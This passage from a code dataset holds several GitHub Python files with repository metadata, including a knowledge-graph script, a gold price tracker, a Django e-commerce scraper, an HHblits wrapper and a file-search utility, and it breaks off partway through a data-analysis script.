dataframe\n\n Args:\n -\n Returns:\n -\n Exception:\n -\n '''\n entity_pairs = [self.extract_entities(sent) for sent in tqdm(self.data[\"sentence\"])]\n relations = [self.extract_relations(sent) for sent in tqdm(self.data['sentence'])]\n self.kd_df = self.get_knowledge_graph_data(entity_pairs, relations)\n\n def get_by_relationship(self, relationship):\n '''\n Dynamically generates and visualizes the part of the graph based on the relationship\n\n Args:\n relationship - key relationship to look for as \n Returns:\n -\n Exception:\n -\n '''\n dir_graph = self.create_network(self.kd_df, relationship)\n self.plot_graph(dir_graph)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--data_path\", type=str, default = \"data/wikipedia_sentences.csv\", help=\"Path to the data csv file\")\n parser.add_argument(\"--relationship\", type=str, default = None, help=\"A relationship between entities to be observed. If left empty, the tool will show EVERYTHING!\")\n args = parser.parse_args()\n\n # Load data\n data = Dataset(args.data_path)\n # Create an object for the knowledge graph\n kg = TextKnowledgeGraph(data()) # data() is same as data.df\n\n # Visualize based on the relationships\n # kg.get_by_relationship(\"written by\")\n # kg.get_by_relationship(\"directed by\")\n # kg.get_by_relationship(\"includes\")\n # kg.get_by_relationship(\"composed by\")\n\n kg.get_by_relationship(args.relationship)","repo_name":"ambareeshravi/Knowledge_Graphs-Text","sub_path":"text_knowledge_graph.py","file_name":"text_knowledge_graph.py","file_ext":"py","file_size_in_byte":7622,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"72606147399","text":"\"\"\"\r\nin this version:\r\n- we use asyncio to execute the functions concurrently\r\n- we use aiohttp to make the requests to the websites\r\n- we use bs4 to parse the html content\r\n- we collect the gold prices from 4 websites\r\n- we get the average price in 3 decimal points and save it in a json file\r\n- we will plot the data in a graph using matplotlib\r\n- we will add get_silver_price() function to get the silver price from 2 websites\r\n\"\"\"\r\n\r\nfrom priceTrackerV8 import *\r\nimport asyncio\r\n\r\n\r\ndef get_stocks_dict():\r\n # read the stocks dict from the stocks.json file\r\n try:\r\n with open('stocks.json', 'r') as f:\r\n stocks = json.load(f)\r\n return stocks\r\n except FileNotFoundError:\r\n print('stocks.json file not found')\r\n return None\r\n\r\n\r\nasync def main():\r\n\r\n # stocks = {\r\n # 'Gold': {\r\n # 'URLs':['https://pricegold.net/ar/kw-kuwait/',\r\n # 'https://ar.fkjewellers.com/pages/gold-price-in-kuwait',\r\n # 'https://wikigerman.net/gold-kw/',\r\n # 'https://www.livepriceofgold.com/'],\r\n #\r\n # 'get_price_function':'get_gold_price24_async'\r\n # },\r\n # 'Silver': {\r\n # 'URLs': ['https://www.livepriceofgold.com/silver-price/kuwait.html',\r\n # 'https://www.prokerala.com/finance/silver-price.php'],\r\n #\r\n # 'get_price_function': 'get_silver_price_async'\r\n # }\r\n # }\r\n #\r\n # # save the stocks dict in a json file\r\n # with open('stocks.json', 'w') as f:\r\n # json.dump(stocks, f, indent=4)\r\n\r\n stocks = get_stocks_dict()\r\n # update the get price function for each stock by the actual function from the priceTrackerV8.py file\r\n for stock_type, stock_data in stocks.items():\r\n stock_data['get_price_function'] = eval(stock_data['get_price_function'])\r\n if not stocks:\r\n return -1\r\n\r\n\r\n\r\n stocks_prices = await get_all_stock_prices(stocks)\r\n\r\n if stocks_prices:\r\n for stock_type, stock_price in stocks_prices:\r\n update_stock_price_json_file(stock_type, stock_price)\r\n\r\n # plot_prices(stocks_prices)\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n # to fix a known bug in that return error on windows\r\n asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())\r\n asyncio.run(main())\r\n","repo_name":"kingbode/GoldPriceTracker","sub_path":"Backup/V8 Backup/goldPriceTrackerV8.0000_Asynch.py","file_name":"goldPriceTrackerV8.0000_Asynch.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"1142568386","text":"from collections import defaultdict\ninput_data = input()\n\ncourses_dict = defaultdict(list)\n\nwhile input_data != 'end':\n\tcourse, student = input_data.split(' : ')\n\tcourses_dict[course].append(student)\n\tinput_data = input()\n\nordered_courses = sorted(courses_dict.items(), key=lambda x: len(x[1]), reverse=True)\n\nfor course in ordered_courses:\n\tstudents = sorted(course[1])\n\tprint(f'{course[0]}: {len(students)}')\n\tfor student in students:\n\t\tprint(f'-- {student}')","repo_name":"hristo-grudev/SoftUni","sub_path":"Python Fundamentals/Dictionaries - Exercise/06. Courses.py","file_name":"06. Courses.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"8923280411","text":"# -*- coding: utf-8 -*-\n\"\"\"\npython-ftgl\n========\n\nUsage:\n\n import ftgl\n font = ftgl.FTGLPixmapFont(\"Arial.ttf\")\n font.FaceSize(72)\n font.Render(\"Hello World!\")\n\n\"\"\"\n\nimport os, sys\n\nfrom distutils.core import setup, Extension\nfrom distutils.command import build_ext\n\ninclude_dirs = [\"/usr/include\", \"/usr/include/freetype2\"]\nlibraries = [\"ftgl\", \"boost_python\"]\nlibrary_dirs = [\"/usr/lib\"]\nsources = []\nfor (root, dirs, files) in os.walk('src'):\n for name in files:\n if name.endswith(\".cpp\"):\n sources.append(\"{}/{}\".format(root,name))\n\next = Extension(name = \"ftgl.__ftgl\",\n include_dirs = include_dirs,\n libraries = libraries,\n library_dirs = library_dirs,\n sources = sources,\n extra_compile_args = [\"-std=c++11\"])\n\n# ccache\nfor path in os.environ[\"PATH\"].split(os.pathsep):\n path = path.strip('\"')\n exe = os.path.join(path, \"ccache\")\n if os.path.isfile(exe) and os.access(exe, os.X_OK):\n os.environ[\"CC\"] = \"ccache gcc\"\n break\n\nsetup(name = \"python-ftgl\",\n long_description = __doc__,\n version = \"0.1.0\",\n description = \"python-ftgl: Python FTGL binding\",\n author = \"mugwort_rc\",\n author_email = \"mugwort rc at gmail com\",\n url = \"https://github.com/mugwort-rc/python-ftgl\",\n classifiers = [\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: C++\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2.7\",\n ],\n license = \"MIT License\",\n packages = [\"ftgl\"],\n\n ext_modules = [ext])\n\n","repo_name":"mugwort-rc/python-ftgl","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"36183931476","text":"import requests\nimport time\nfrom bs4 import BeautifulSoup\nfrom django.shortcuts import render\nfrom .models import Search\nfrom requests.compat import quote_plus\nfrom . import models\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\nBASE_AMAZON_URL='https://www.amazon.in/s?k={}'\nBASE_FLIPKART_URL='https://www.flipkart.com/search?q={}'\nBASE_SNAPDEAL_URL='https://www.snapdeal.com/search?keyword={}'\n\n# Create your views here.\ndef home(request):\n stuff_for_frontend={\n 'title': \"Home\",\n }\n return render(request,'scrape/home.html',stuff_for_frontend)\n\ndef new_search(request):\n search=request.POST.get('search')\n models.Search.objects.create(search=search)\n\n #AMAZON STUFF HERE\n final_amazon_url=BASE_AMAZON_URL.format(quote_plus(search))\n response=requests.get(final_amazon_url)\n data=response.content\n soup=BeautifulSoup(data,features='html.parser')\n name,amazon_ratings,amazon_name,amazon_img,amazon_price,amazon_link=[],[],[],[],[],[]\n amazon_postings=[]\n #count_ratings=0\n for dataId in soup.findAll(has_data_asin):\n name=dataId.findChildren('span', {\"class\": \"a-size-medium a-color-base a-text-normal\"})\n if name==[]:\n name=dataId.findChildren('span', {\"class\": \"a-size-base-plus a-color-base a-text-normal\"})\n rating_ama = dataId.findChildren('span', {\"class\": \"a-icon-alt\"})\n for r2 in rating_ama:\n rt = r2.text\n x = rt.split(' ')\n print(r2)\n if (len(amazon_ratings))<3:\n \n print(amazon_ratings)\n if r2==[]:\n amazon_ratings.append(-1)\n else:\n amazon_ratings.append(float(x[0]))\n x.clear()\n flag = True\n\n content = []\n for item1 in name:\n item1 = [content for content in item1.text.split('\\n') if len(content) > 0]\n item1 = ' '.join(item1)\n content.append(item1)\n for i in content:\n if search.lower() in i.lower():\n if len(amazon_name)<3:\n amazon_name.append(i)\n else:\n flag = False\n price_flag = False\n \n image = dataId.findChildren('img', { \"class\" : \"s-image\" })\n #print(image[0]['src'])\n if len(amazon_img)<3:\n amazon_img.append(image[0]['src'])\n \n rating2 = dataId.findChildren('span', {\"class\": \"a-size-medium a-color-base a-text-beside-button a-text-bold\"})\n #print(rating2)\n price = dataId.findChildren('span', {\"class\": \"a-color-price\"})\n if(price == []):\n price = dataId.findChildren('span', {\"class\": \"a-price-whole\"})\n price_flag = True\n #print(price)\n content1 = []\n if price == [] and len(amazon_price)<3:\n amazon_price.append('NA')\n else:\n for item2 in price:\n item2 = [content1 for content1 in item2.text.split('\\n') if len(content1) > 0]\n item2 = ' '.join(item2)\n content1.append(item2)\n for i in content1:\n if flag:\n if len(amazon_price)<3:\n amazon_price.append(i)\n\n links_with_text = []\n for a in dataId.findChildren('a', {\"class\": \"a-link-normal a-text-normal\"}, href=True):\n if a.text:\n links_with_text.append(a['href'])\n if links_with_text==[]:\n for a in dataId.findChildren('a', {\"class\": \"a-link-normal a-text-normal\"}, href=True):\n if a.text:\n links_with_text.append(a['href'])\n for t in links_with_text:\n if flag:\n #print(\"https://www.amazon.in\"+t)\n if len(amazon_link)<3:\n amazon_link.append(\"https://www.amazon.in\"+t)\n \n if len(amazon_link)==3:\n break\n\n m=len(amazon_name)\n n=len(amazon_ratings)\n if n0: \n #print(amazon_name,len(amazon_price),len(amazon_name),len(amazon_ratings)) \n for i in range(len(amazon_name)):\n print(i)\n amazon_postings.append((amazon_name[i],amazon_link[i],amazon_price[i],amazon_img[i],amazon_ratings[i]))\n \n print(\"AMAZON:\\n\",amazon_img,'\\n',amazon_price,'\\n',amazon_name,'\\n',amazon_link,'\\n',amazon_ratings)\n \n\n # FLIPKART STUFF HERE\n \n final_flipkart_url=BASE_FLIPKART_URL.format(quote_plus(search))\n response=requests.get(final_flipkart_url)\n data=response.content\n soup=BeautifulSoup(data,features='html.parser')\n flipkart_price,flipkart_link,flipkart_name,flipkart_rating,flipkart_img=[],[],[],[],[]\n temp,count=0,0\n\n options = Options()\n driver = webdriver.Chrome(r'D:\\Downloads\\chromedriver.exe', options=options)\n driver.get(final_flipkart_url)\n driver.implicitly_wait(2)\n src=[]\n image = driver.find_elements_by_tag_name('img')\n for i in image:\n src.append(i.get_attribute('src'))\n for a in src:\n if 'q=70' in a:\n if len(flipkart_img)<3:\n flipkart_img.append(a)\n driver.close()\n\n for dataId in soup.findAll(has_id_no_class):\n name = dataId.findChildren('div', {\"class\": \"_3wU53n\"})\n if name == []:\n name = dataId.findChildren('a', {\"class\": \"_2cLu-l\"})\n temp += 1\n else:\n temp = 0 \n name2 = name.copy()\n image = dataId.findChildren('img')\n #print(image)\n rating = dataId.findChildren('div', {\"class\": \"hGSR34\"})\n for r in rating:\n if len(flipkart_rating)<3:\n flipkart_rating.append(float(r.text))\n flag = True\n content = []\n for item1 in name:\n item1 = [content for content in item1.text.split('\\n') if len(content) > 0]\n item1 = ' '.join(item1)\n content.append(item1)\n for i in content:\n if search.lower() in i.lower():\n if len(flipkart_name)<3:\n flipkart_name.append(i)\n else:\n flag = False\n\n while len(flipkart_rating)!=len(flipkart_name):\n flipkart_rating.append(-1)\n\n \n price = dataId.findChildren('div', {\"class\": \"_1vC4OE _2rQ-NK\"})\n if price == []:\n price = dataId.findChildren('div', {\"class\": \"_1vC4OE\"})\n content1 = []\n for item2 in price:\n item2 = [content1 for content1 in item2.text.split('\\n') if len(content1) > 0]\n item2 = ' '.join(item2)\n content1.append(item2)\n for i in content1:\n if flag:\n if len(flipkart_price)<3:\n flipkart_price.append(i)\n\n links_with_text = []\n if temp == 0:\n for a in dataId.findChildren('a', {\"class\": \"_31qSD5\"}, href=True):\n if a.text:\n links_with_text.append(a['href'])\n for t in links_with_text:\n if flag:\n if len(flipkart_link)<3:\n flipkart_link.append(\"https://www.flipkart.com\"+t)\n elif temp>0:\n for i in name2:\n links_with_text.append(i['href'])\n for t in links_with_text:\n if flag:\n if len(flipkart_link)<3:\n flipkart_link.append(\"https://www.flipkart.com\"+t)\n\n print(len(flipkart_price),len(flipkart_link),len(flipkart_name),len(flipkart_rating),len(flipkart_img))\n print(\"FLIPKART\\n\",flipkart_price,'\\n',flipkart_link,'\\n',flipkart_name,'\\n',flipkart_rating,'\\n',flipkart_img)\n flipkart_postings=[]\n if len(flipkart_name)>0:\n for i in range(len(flipkart_name)):\n # print(i)\n flipkart_postings.append((flipkart_name[i],flipkart_link[i],flipkart_price[i],flipkart_img[i],flipkart_rating[i]))\n\n\n\n\n\n\n\n #SNAPDEAL STUFF HERE\n final_SD_url=BASE_SNAPDEAL_URL.format(quote_plus(search))\n response=requests.get(final_SD_url)\n data=response.content\n soup=BeautifulSoup(data,features='html.parser')\n SD_price,SD_link,SD_name,SD_rating,SD_img=[],[],[],[],[]\n image = soup.findChildren('img', { \"class\" : \"product-image\" })\n price = soup.findChildren('span', { \"class\" : \"lfloat product-price\" })\n name = soup.findChildren('p', { \"class\" : \"product-title\" })\n link = soup.findChildren('a', { \"class\" : \"dp-widget-link noUdLine\" }, href = True)\n #print(price)\n for i in image:\n if len(SD_img)<3:\n if i==[]:\n SD_img.append('NA')\n else:\n SD_img.append(i['src'])\n for j in price:\n if len(SD_price)<3:\n if j==[]:\n SD_price.append('Price Unavailable')\n else:\n SD_price.append(j.text)\n for n in name:\n if len(SD_name)<3:\n if n==[]:\n SD_name.append('Name not available')\n else:\n SD_name.append(n.text)\n for l in link:\n if len(SD_link)<3:\n if l==[]:\n SD_link.append('#')\n else:\n SD_link.append(l['href'])\n # print()\n # print()\n print(\"SD:\\n\",SD_img,'\\n',SD_price,'\\n',SD_name,'\\n',SD_link)\n SD_postings=[]\n if len(SD_name)>0:\n for i in range(len(SD_name)):\n # print(i)\n SD_postings.append((SD_name[i],SD_link[i],SD_price[i],SD_img[i]))\n \n\n stuff_for_frontend={\n 'title': search.capitalize(),\n 'search':search,\n 'amazon_postings':amazon_postings,\n 'flipkart_postings': flipkart_postings,\n 'SD_postings': SD_postings,\n }\n return render(request, 'scrape/new_search.html',stuff_for_frontend)\n\n\n\ndef has_data_asin(tag): #for amazon\n return tag.has_attr('data-asin')\n\ndef has_id_no_class(tag): #for flipkart\n return tag.has_attr('data-id') and not tag.has_attr('class')","repo_name":"kamathprasad9/django-web-scrapper","sub_path":"django_project/scrape/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29965913091","text":"\"\"\"\nHHSuite wrappers.\n\n\"\"\"\n\nimport os\nimport json\nimport gzip\nimport shutil\nimport multiprocessing\n\nimport tqdm\n\n\ndef run_pdblist(pdblist, db, n_threads=None, hh_iters='2', use_msa=False, mact=0.35):\n if n_threads is None:\n n_threads = multiprocessing.cpu_count() // 2\n \n pool = multiprocessing.Pool(n_threads)\n promises = {}\n\n for molid, dat in sorted(pdblist.items()):\n seq = ''.join(r['restype'] for r in dat)\n promises[molid] = pool.apply_async(hhblits, (molid, seq, db, hh_iters), {'use_msa': use_msa, 'mact': mact}), seq\n\n longest_seq = 0\n profiles_out = {}\n\n desc = 'Running HHBlits'\n for molid, (promise, seq) in tqdm.tqdm(sorted(promises.items()), ncols=80,\n desc=desc, leave=True, smoothing=0):\n try:\n hhout = promise.get()\n except Exception:\n raise Exception('Error:' + molid)\n\n if hhout['seq'] != seq:\n # print(molid.upper() + '.*')\n raise Exception('Error:' + molid)\n\n profiles_out[molid] = hhout\n\n return profiles_out\n\n\ndef freq(freqstr):\n if freqstr == '*':\n return 0.\n p = 2**(int(freqstr) / -1000)\n assert 0 <= p <= 1.0\n return p\n\n\ndef parse_hhm(hhmfp):\n neff = None\n for line in hhmfp:\n if line[0:4] == 'NEFF' and neff is None:\n neff = float(line[4:].strip())\n if line[0:8] == 'HMM A':\n header1 = line[7:].strip().split('\\t')\n break\n\n header2 = next(hhmfp).strip().split('\\t')\n next(hhmfp)\n\n seq = []\n profile = []\n for line in hhmfp:\n if line[:2] == '//':\n break\n aa = line[0]\n seq.append(aa)\n\n freqs = line[7:].split('\\t')[:20]\n features = {h: freq(i) for h, i in zip(header1, freqs)}\n assert len(freqs) == 20\n\n mid = next(hhmfp)[7:].strip().split('\\t')\n\n features.update({h: freq(i) for h, i in zip(header2, mid)})\n\n profile.append(features)\n next(hhmfp)\n\n return {\n 'seq': ''.join(seq),\n 'profile': profile,\n 'neff': neff,\n 'header': header1 + header2,\n }\n\n\ndef hhblits(molid, seq, db, hh_iters='2', cachedir='/data/Cache/NetSurfP-2.0/hhblits', use_msa=False, mact='0.35'):\n\n mact = '{:.2f}'.format(float(mact))\n\n db_short = os.path.split(db)[-1]\n cachedir = os.path.join(cachedir, db_short, 'N{}M{}'.format(hh_iters, mact))\n if not os.path.isdir(cachedir):\n try:\n os.mkdir(cachedir)\n except FileExistsError:\n pass\n\n molid = molid.upper()\n cachebase = os.path.join(cachedir, molid)\n cachefile = cachebase + '.hhm'\n\n import gzip\n import tempfile\n import subprocess\n\n if os.path.isfile(cachefile):\n if not use_msa:\n with open(cachefile) as hhmfp:\n return parse_hhm(hhmfp)\n else:\n raise NotImplementedError\n \n # with gzip.open(cachefile, 'rt') as f:\n # if not use_msa:\n # hhmfilename = cachebase + '.hhm'\n # with open(hhmfilename) as hhmfp:\n # parsed_hhm = \n # return json.load(f)\n # else:\n # outa3m = cachebase + '.a3m'\n # proc = subprocess.run(['hhmake', '-i', outa3m, '-v', '0',\n # '-o', 'stdout'],\n # universal_newlines=True,\n # stdout=subprocess.PIPE,\n # stderr=subprocess.PIPE)\n # with open(cachebase + '.a3m.hhm', 'w') as f:\n # f.write(proc.stdout)\n\n # return parse_hhm(iter(proc.stdout.splitlines()))\n\n\n with tempfile.NamedTemporaryFile(mode='w', suffix='.fasta') as tmpf, \\\n tempfile.NamedTemporaryFile(suffix='.hhm', mode='rt') as outf, \\\n tempfile.NamedTemporaryFile(suffix='.a3m', mode='rt') as outa3m:\n print('>' + molid, file=tmpf)\n print(seq, file=tmpf)\n tmpf.flush()\n\n cmd = [\n 'hhblits', '-i', tmpf.name, '-o', '/dev/null', '-ohhm', outf.name,\n '-n', str(hh_iters), '-d', db, '-cpu', '2', '-oa3m', outa3m.name,\n '-mact', mact,\n ] # yapf: disable\n\n try:\n # os.environ['HHLIB'] = '/opt/hhsuite'\n o = subprocess.check_output(\n cmd, stderr=subprocess.STDOUT, universal_newlines=True)\n except subprocess.CalledProcessError as exc:\n print(exc.returncode, exc.output)\n raise\n\n outfname = outf.name\n outf = iter(outf)\n dat = parse_hhm(outf)\n\n # with gzip.open(cachefile, 'wt') as f:\n # json.dump(dat, f)\n \n shutil.copyfile(outfname, cachebase + '.hhm')\n shutil.copyfile(outa3m.name, cachebase + '.a3m')\n\n return dat","repo_name":"Eryk96/NetSurfP-3.0","sub_path":"nsp2/netsurfp2_dev/preprocessing/hhsuite.py","file_name":"hhsuite.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"63"} +{"seq_id":"12399494704","text":"#!/usr/bin/python3\n\n\n# Python imports\nimport os\nimport traceback\nimport argparse\nimport subprocess\nimport json\nimport base64\nimport time\nfrom datetime import datetime\nfrom setproctitle import setproctitle\nfrom multiprocessing.connection import Client\n\n# Lib imports\n\n# Application imports\n\n\n\n\n_ipc_address = f'/tmp/solarfm-search_grep-ipc.sock'\n_ipc_authkey = b'' + bytes(f'solarfm-search_grep-ipc', 'utf-8')\n\nfilter = (\".cpp\", \".css\", \".c\", \".go\", \".html\", \".htm\", \".java\", \".js\", \".json\", \".lua\", \".md\", \".py\", \".rs\", \".toml\", \".xml\", \".pom\") + \\\n (\".txt\", \".text\", \".sh\", \".cfg\", \".conf\", \".log\")\n\n# NOTE: Create timestamp of when this launched. Is used in IPC to see if\n# we are stale and that new call didn't fully kill this or older processes.\ndt = datetime.now()\nts = datetime.timestamp(dt)\n\n\ndef send_ipc_message(message) -> None:\n conn = Client(address=_ipc_address, family=\"AF_UNIX\", authkey=_ipc_authkey)\n conn.send(message)\n conn.close()\n\n # NOTE: Kinda important as this prevents overloading the UI thread\n time.sleep(0.05)\n\n\ndef file_search(path, query):\n try:\n for _path, _dir, _files in os.walk(path, topdown = True):\n for file in _files:\n if query in file.lower():\n target = os.path.join(_path, file)\n data = f\"SEARCH|{ts}|{json.dumps([target, file])}\"\n send_ipc_message(data)\n except Exception as e:\n print(\"Couldn't traverse to path. Might be permissions related...\")\n traceback.print_exc()\n\n\ndef grep_search(target=None, query=None):\n if not query or not target:\n return\n\n # NOTE: -n = provide line numbers, -R = Search recursive in given target\n # -i = insensitive, -F = don't do regex parsing. (Treat as raw string)\n command = [\"grep\", \"-n\", \"-R\", \"-i\", \"-F\", query, target]\n proc = subprocess.Popen(command, stdout=subprocess.PIPE, encoding=\"utf-8\")\n raw_data = proc.communicate()[0].strip()\n proc_data = raw_data.split(\"\\n\") # NOTE: Will return data AFTER completion (if any)\n collection = {}\n\n for line in proc_data:\n file, line_no, data = line.split(\":\", 2)\n b64_file = base64.urlsafe_b64encode(file.encode('utf-8')).decode('utf-8')\n b64_data = base64.urlsafe_b64encode(data.encode('utf-8')).decode('utf-8')\n\n if b64_file in collection.keys():\n collection[f\"{b64_file}\"][f\"{line_no}\"] = b64_data\n else:\n collection[f\"{b64_file}\"] = {}\n collection[f\"{b64_file}\"] = { f\"{line_no}\": b64_data}\n\n try:\n data = f\"GREP|{ts}|{json.dumps(collection, separators=(',', ':'), indent=4)}\"\n send_ipc_message(data)\n except Exception as e:\n ...\n\n collection = {}\n\n\ndef search(args):\n if args.type == \"file_search\":\n file_search(args.dir, args.query.lower())\n\n if args.type == \"grep_search\":\n grep_search(args.dir, args.query.encode(\"utf-8\"))\n\n\nif __name__ == \"__main__\":\n try:\n setproctitle('SolarFM: File Search - Grepy')\n\n parser = argparse.ArgumentParser()\n # Add long and short arguments\n parser.add_argument(\"--type\", \"-t\", default=None, help=\"Type of search to do.\")\n parser.add_argument(\"--dir\", \"-d\", default=None, help=\"Directory root for search type.\")\n parser.add_argument(\"--query\", \"-q\", default=None, help=\"Query search is working against.\")\n\n # Read arguments (If any...)\n args = parser.parse_args()\n search(args)\n except Exception as e:\n traceback.print_exc()\n","repo_name":"maximstewart/SolarFM","sub_path":"plugins/searcher/utils/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"63"} +{"seq_id":"6787412262","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nRun tests for the Dalite XBlock.\n\nThis script is required to run our selenium tests inside the xblock-sdk workbench\nbecause the workbench SDK's settings file is not inside any python module.\n\"\"\"\n\nimport os\nimport sys\n\nimport logging\n\n\ndef main():\n \"\"\"Main entry point.\"\"\"\n noisy_logger_overrides = {\n 'workbench.views': logging.ERROR,\n 'django.request': logging.ERROR,\n 'workbench.runtime': logging.ERROR,\n }\n\n # Use the workbench settings file:\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"workbench.settings\")\n # Configure a range of ports in case the default port of 8081 is in use\n os.environ.setdefault(\"DJANGO_LIVE_TEST_SERVER_ADDRESS\", \"localhost:8081-8099\")\n\n for noisy_logger, log_level in noisy_logger_overrides.iteritems():\n logging.getLogger(noisy_logger).setLevel(log_level)\n\n from django.core.management import execute_from_command_line\n args = sys.argv[1:]\n paths = [arg for arg in args if arg[0] != '-']\n if not paths:\n paths = [\"tests/\"]\n options = [arg for arg in args if arg not in paths]\n execute_from_command_line([sys.argv[0], \"test\"] + paths + options)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"open-craft/xblock-dalite","sub_path":"run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"33216780693","text":"import csv\nimport urllib.request\nimport urllib.parse \nimport os.path\nfrom os import walk\nimport json\n\ndef yasbtoxws( url ):\n if len(url) > 0:\n newurl = url.replace( 'raithos.github.io', 'squad2xws.herokuapp.com/yasb/xws')\n\n with urllib.request.urlopen( newurl ) as response:\n return json.loads( response.read(), encoding='UTF-8' ) \n\nttt = {}\n\ndef savetoxws( path, row ):\n \n name = row[0]\n if len(name) == 0:\n name = row[1]\n cleanname = \"\".join([c for c in name if c.isalpha() or c.isdigit() or c==' ' or c=='_' or c=='(' or c ==')']).rstrip()\n filename = path + cleanname + '.json' \n\n if not os.path.isfile( filename ):\n print('Saving ' + filename)\n j = {}\n j['VassalForm1'] = row[0]\n j['VassalForm2'] = row[1]\n j['Name'] = row[2]\n j['Discord'] = row[3]\n j['TTT'] = row[4]\n\n j['Option1'] = yasbtoxws(row[5])\n j['Option2'] = yasbtoxws(row[6])\n j['Drop'] = row[7]\n j['Add'] = row[8]\n\n if row[4] in ttt:\n if 'list' in ttt[row[4]]:\n j['Final'] = ttt[row[4]]['list']\n with open(filename, 'w', encoding='UTF-8') as xws:\n xws.write( json.dumps(j, sort_keys=True, indent=4, separators=(',', ': ')) )\n else:\n print('No list for ' + row[4])\n else:\n print('Who is ' + row[4])\n\n if row[4] in ttt:\n del ttt[ row[4] ]\n\ndef saverowtoxws( row ):\n savetoxws( './xws-final/', row )\n\nwith open( 'jto.json', 'r', encoding='UTF-8') as tttf:\n tttj = json.load( tttf )\n for player in tttj['tournament']['players']:\n ttt[ player['name'] ] = player\n\n# get all the XWS if we don't have them\nwith open('JTO Fully Correlated - Correlated.csv', 'r', encoding='UTF-8') as csvfile:\n reader = csv.reader(csvfile, delimiter=',' )\n next(reader)\n for row in reader:\n try:\n saverowtoxws(row)\n except urllib.error.HTTPError as err:\n print(err.url)\n except json.decoder.JSONDecodeError as err:\n print('JSONDecodeError for ' + row[0] + ' ' + row[1] )\n \n\n# combine them all now\nxwsfiles = []\nfor (dirpath, dirnames, filenames) in walk('./xws-final/'):\n for filename in filenames:\n xwsfiles.append ( os.path.join( dirpath, filename ) )\n\ncombined = []\n\nfor xwsfile in xwsfiles:\n with open(xwsfile,'r', encoding='UTF-8') as xws:\n combined.append(json.load(xws))\n\nwith open('combined-final.json', 'w', encoding='UTF-8') as output:\n output.write( json.dumps(combined, sort_keys=True, indent=4, separators=(',', ': '))) \n","repo_name":"XPav/jtoanalysis","sub_path":"getxws-final.py","file_name":"getxws-final.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"43521062346","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 9 14:40:01 2023\n\n@author: kthat\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport stats as stats\n\n\ndef read_data(datafile):\n \"\"\"\n Read data from excel file and return dataframe\n \"\"\"\n data = pd.read_excel(datafile)\n return data\n\n\ndef print_to_file(df_m):\n \"\"\"\n This method is common print used to print given data to text file\n \"\"\"\n x = np.random.randint(1, 100)\n filename = \"dataframe\" + str(x) + \".txt\"\n textfile = open(filename, \"w\")\n df_m.to_string(textfile)\n textfile.close()\n\n\ndef manipulate_data(df, ind_header, ind_value, years, countries):\n \"\"\"\n Filter data, manipulate, and transpose dataframe to draw plot from it\n \"\"\"\n # Groupby indicator and values\n df_m = df.groupby(ind_header, group_keys=True)\n df_m = df_m.get_group(ind_value)\n # Set index and filter data\n df_m = df_m.reset_index()\n df_m = df_m.set_index('Country Name')\n df_m = df_m.loc[:, years]\n df_m = df_m.loc[countries, :]\n # Remove null values\n df_m = df_m.dropna()\n # Round to 2 decimal float\n df_m = round(df_m, 3)\n # Transpose dataframe\n df_transpose = df_m.transpose()\n\n return df_transpose, df_m\n\n\ndef draw_barplot(df, title):\n \"\"\" \n This method is used to create a bar plot.\n Arguments: x and y will be selectively assigned by method attributes. \n \"\"\"\n # Plot bar\n fig, ax = plt.subplots()\n ax = df.plot.bar()\n # Add label and title\n ax.set_title(title, color=\"red\", fontsize=10)\n ax.legend(loc=\"upper right\", fontsize='x-small')\n plt.show()\n\n return\n\n\ndef draw_heatmap(corr, country, cmap):\n \"\"\" \n This method is used to create a heatmap.\n Arguments: x and y will be selectively assigned by method attributes. \n \"\"\"\n # Plot heatmap\n plt.figure(figsize=(25, 12))\n sns.heatmap(corr, annot=True, fmt=\".2f\", cmap=cmap, annot_kws={'size': 28})\n plt.title('Correlation Heatmap for ' + country, fontsize=30)\n plt.show()\n\n return\n\n\ndef prepare_stats(df, years, coun_header, coun_value):\n \"\"\" \n This method is used to prepare dataset to retrieve statistics data and find correlation matrix.\n \"\"\"\n # Groupby indicator values\n df_m = df.groupby(coun_header, group_keys=True)\n df_m = df_m.get_group(coun_value)\n df_m = df_m.reset_index()\n df_m = df_m.set_index('Series Name')\n df_m = df_m.loc[:, years]\n # Remove null values\n df_m = df_m.dropna()\n # Transpose dataframe\n df_transpose = df_m.transpose()\n # Find correlation matrix\n correlation = df_transpose.corr()\n\n return df_m, df_transpose, correlation\n\n\ndef stats_summary(df_m):\n # Find describe stats variables\n describe_stats = df_m.describe()\n print_to_file(describe_stats)\n # Find skewness of distribution and print\n 